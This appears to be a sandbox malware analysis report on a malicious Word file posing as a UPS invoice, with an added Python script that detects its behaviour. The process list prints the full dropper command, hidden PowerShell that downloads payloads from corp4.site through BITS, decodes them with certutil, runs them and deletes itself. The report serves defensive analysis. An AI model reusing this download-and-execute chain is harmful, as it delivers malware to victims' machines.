Analysis

  • max time kernel
    129s
  • resource
    win7v191014
  • submitted
    11-12-2019 20:15

General

  • Target

    ups_invoice3105183.doc

  • Sample

    191211-xasqnnchds

  • SHA256

    0346971c0cf96bb3b143aea0e307f2d94af8a18474cc8e50dab4bcad965d2aa6

Malware Config

Extracted

  • Language
    ps1
  • Source URLs (exe.dropper)
    http://corp4.site/cVIka.dat
    http://corp4.site/vben.dat
    http://corp4.site/LugVP.dat

Signatures

  • Drops file in Windows directory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Drops file in System32 directory 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks for installed software on the system 1 TTPs 34 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ups_invoice3105183.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1992
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp4.site/cVIka.dat,http://corp4.site/vben.dat,http://corp4.site/LugVP.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\LugVP.exe\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera comport; Start-Process vido.com -ArgumentList comport
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1956
    • C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decode sfera comport
      2⤵
      • Drops file in Windows directory
      PID:1320
    • C:\Users\Admin\AppData\Local\Temp\vido.com
      "C:\Users\Admin\AppData\Local\Temp\vido.com" comport
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetThreadContext
      PID:912
      • C:\Users\Admin\AppData\Local\Temp\vido.com
        "C:\Users\Admin\AppData\Local\Temp\vido.com"
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:1924
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\vido.com"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1
            5⤵
            • Runs ping.exe
            PID:1320
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "184422301228799135618944460-322814422-178056611075657119908867499-803790831"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1972
  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
    1⤵
    PID:1240
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1536848138253499463-163022004-15684493871335174701-10249533651716853959-2048248036"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1536
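The PowerShell one-liner under PID 1956 is the whole dropper in one command: BITS fetches three payloads into %TEMP%, certutil -decode turns the base64 blob `sfera` into `comport`, `vido.com` is started with `comport` as its argument, and the chain finally removes itself with `ping 127.0.0.1 && del`. The Python below is an added triage example written for this page, not part of the sandbox output: it pairs each `-Source` URL with its `-Destination` file and flags the command-line indicators visible in the process list. The command lines are copied from the Processes section above; the indicator names, regexes and the default %TEMP% path in `expand_temp` are this example's own assumptions.

```python
"""Triage helpers for the dropper chain in the process list above.

Added example for this report, not part of the sandbox output. Command lines
are copied from the Processes section; indicator names, regexes and the
default %TEMP% path are this example's own assumptions.
"""
import re
from typing import Dict, List

# Command lines copied from the process list above, keyed by the reported PID.
# PING.EXE is omitted: the report shows it with PID 1320, the same PID certutil
# had, so the PID was reused after certutil exited.
PROCESS_CMDLINES: Dict[int, str] = {
    1956: (
        r'powershell -windowstyle hidden -command Import-Module BitsTransfer; '
        r'Start-BitsTransfer -Source http://corp4.site/cVIka.dat,http://corp4.site/vben.dat,'
        r'http://corp4.site/LugVP.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",'
        r'\"$env:TEMP\LugVP.exe\"; Set-Location -Path \"$env:TEMP\"; '
        r'certutil -decode sfera comport; Start-Process vido.com -ArgumentList comport'
    ),
    1320: r'"C:\Windows\system32\certutil.exe" -decode sfera comport',
    912: r'"C:\Users\Admin\AppData\Local\Temp\vido.com" comport',
    2032: r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del '
          r'"C:\Users\Admin\AppData\Local\Temp\vido.com"',
}

# Each indicator is a regex over the raw command line. The names are this
# example's own; tune them before using them as production detections.
INDICATORS = {
    # PowerShell with a hidden window is rarely legitimate from a user session.
    "hidden_powershell": re.compile(r'powershell(\.exe)?"?\s.*-w(indowstyle)?\s+hidden', re.I),
    # BITS as a downloader blends in with update traffic and leaves no browser history.
    "bits_download": re.compile(r'Start-BitsTransfer\b.*-Source\s+\S*https?://', re.I),
    # certutil -decode turns a base64 blob into a binary (LOLBin abuse).
    "certutil_decode": re.compile(r'certutil(\.exe)?"?\s+.*-decode\b', re.I),
    # An executable-extension file under %TEMP%, as the image or as a delete target.
    "temp_executable_path": re.compile(r'\\AppData\\Local\\Temp\\[^\\"\s]+\.(?:com|exe|scr|pif)\b', re.I),
    # ping 127.0.0.1 as a sleep before deleting the payload: classic self-cleanup.
    "ping_then_delete": re.compile(r'ping\s+127\.0\.0\.1\b.*&&\s*del\b', re.I),
}


def flag_cmdline(cmdline: str) -> List[str]:
    """Return the sorted names of every indicator that matches the command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def _split_list(arg: str) -> List[str]:
    # The sandbox shows the command as it crossed CreateProcess, so PowerShell's
    # quotes appear as \" escapes; strip them and a trailing ';' before splitting.
    cleaned = arg.rstrip(';').replace('\\"', '').replace('"', '')
    return [part for part in cleaned.split(',') if part]


def parse_bits_transfer(cmdline: str) -> Dict[str, str]:
    """Map each Start-BitsTransfer -Source URL to its -Destination path."""
    src = re.search(r'-Source\s+(\S+)', cmdline)
    dst = re.search(r'-Destination\s+(\S+)', cmdline)
    if not (src and dst):
        return {}
    sources, dests = _split_list(src.group(1)), _split_list(dst.group(1))
    if len(sources) != len(dests):
        # Start-BitsTransfer requires one destination per source; anything else
        # means the parse went wrong, so fail loudly instead of mispairing.
        raise ValueError("Start-BitsTransfer needs one destination per source")
    return dict(zip(sources, dests))


def expand_temp(path: str, temp: str = r"C:\Users\Admin\AppData\Local\Temp") -> str:
    """Resolve $env:TEMP to the sandbox user's temp directory (default assumed from the report)."""
    return re.sub(r'\$env:TEMP', lambda _m: temp, path, flags=re.I)


def triage() -> Dict[int, List[str]]:
    """Flag every command line in the process list, keyed by PID."""
    return {pid: flag_cmdline(cmd) for pid, cmd in PROCESS_CMDLINES.items()}


if __name__ == "__main__":
    for url, dest in parse_bits_transfer(PROCESS_CMDLINES[1956]).items():
        print(f"{url} -> {expand_temp(dest)}")
    for pid, flags in triage().items():
        print(pid, ", ".join(flags) or "-")
```

The URL-to-file mapping is what turns the three `exe.dropper` URLs in Malware Config into the filenames the rest of the report refers to (`vido.com`, `sfera`, `LugVP.exe`), and the per-process flags show why PID 1956 alone carries three independent detection opportunities even before anything executes.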

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry, T1012 (3)
    • System Information Discovery, T1082 (1)
    • Remote System Discovery, T1018 (1)


Downloads

  • C:\Users\Admin\AppData\Local\Temp\comport
  • memory/1924-15-0x00000000000C0000-0x000000000011D000-memory.dmp (Filesize: 372KB)
  • memory/1924-16-0x00000000000C0000-0x000000000011D000-memory.dmp (Filesize: 372KB)
  • memory/1992-0-0x0000000006260000-0x0000000006264000-memory.dmp (Filesize: 16KB)
  • memory/1992-5-0x0000000002020000-0x0000000002021000-memory.dmp (Filesize: 4KB)
  • memory/1992-6-0x0000000002020000-0x0000000002021000-memory.dmp (Filesize: 4KB)
  • memory/1992-7-0x0000000002020000-0x0000000002021000-memory.dmp (Filesize: 4KB)
  • memory/1992-11-0x00000000080B0000-0x00000000080B4000-memory.dmp (Filesize: 16KB)
  • memory/1992-12-0x00000000070B0000-0x00000000070B4000-memory.dmp (Filesize: 16KB)
  • memory/1992-13-0x0000000006260000-0x0000000006264000-memory.dmp (Filesize: 16KB)
  • memory/1992-14-0x00000000048D0000-0x00000000048D4000-memory.dmp (Filesize: 16KB)